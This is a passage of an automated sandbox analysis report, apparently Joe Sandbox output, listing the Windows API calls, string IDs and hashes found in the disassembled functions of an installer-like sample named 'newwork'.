                                                                                          • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                        • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                        • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                        • API String ID: 142928637-2676053874
                                                                                        • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                        • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                                        • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                        • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                        • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                        • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                        • API String ID: 2238633743-1050967733
                                                                                        • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                        • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                        • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                        • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                        • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                        • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                        • API String ID: 667068680-222143506
                                                                                        • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                        • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                        • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                        • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                        APIs
                                                                                        • GetFocus.USER32 ref: 0041B57E
                                                                                        • GetDC.USER32(?), ref: 0041B58A
                                                                                        • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                        • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                        • String ID:
                                                                                        • API String ID: 2502006586-0
                                                                                        • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                        • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                        • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                        • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                        APIs
                                                                                        • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                        • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                        • API String ID: 1452528299-1580325520
                                                                                        • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                        • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                        • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                        • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                        • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDeviceMetricsSystem$Release
                                                                                        • String ID:
                                                                                        • API String ID: 447804332-0
                                                                                        • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                        • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                        • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                        • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                        • LocalFree.KERNEL32(005DF2B0,00000000,00401B68), ref: 00401ACF
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,005DF2B0,00000000,00401B68), ref: 00401AEE
                                                                                        • LocalFree.KERNEL32(005E02B0,?,00000000,00008000,005DF2B0,00000000,00401B68), ref: 00401B2D
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                        • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3782394904-0
                                                                                        • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                        • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                        • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                        • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                        APIs
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                        • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                        • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$Show
                                                                                        • String ID:
                                                                                        • API String ID: 3609083571-0
                                                                                        • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                        • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                        • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                        • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                        APIs
                                                                                          • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                        • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                        • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                          • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                        • String ID:
                                                                                        • API String ID: 3527656728-0
                                                                                        • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                        • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                        • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                        • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFileHandle
                                                                                        • String ID: !nI$.tmp$_iu
                                                                                        • API String ID: 3498533004-584216493
                                                                                        • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                        • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                                                        • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                        • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                                        APIs
                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                          • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                          • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                        • String ID: .dat$.msg$IMsg$Uninstall
                                                                                        • API String ID: 3312786188-1660910688
                                                                                        • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                        • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                        • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                        • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                        • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                        • API String ID: 828529508-2866557904
                                                                                        • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                        • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                                        • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                        • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                                        APIs
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                        • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                        • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                        • API String ID: 2573145106-3235461205
                                                                                        • Opcode ID: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                        • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                        • Opcode Fuzzy Hash: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                        • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                        • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                        • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                        • API String ID: 3478007392-2498399450
                                                                                        • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                        • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                        • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                        • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                        APIs
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                        • String ID: AllowSetForegroundWindow$user32.dll
                                                                                        • API String ID: 1782028327-3855017861
                                                                                        • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                        • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                        • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                        • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
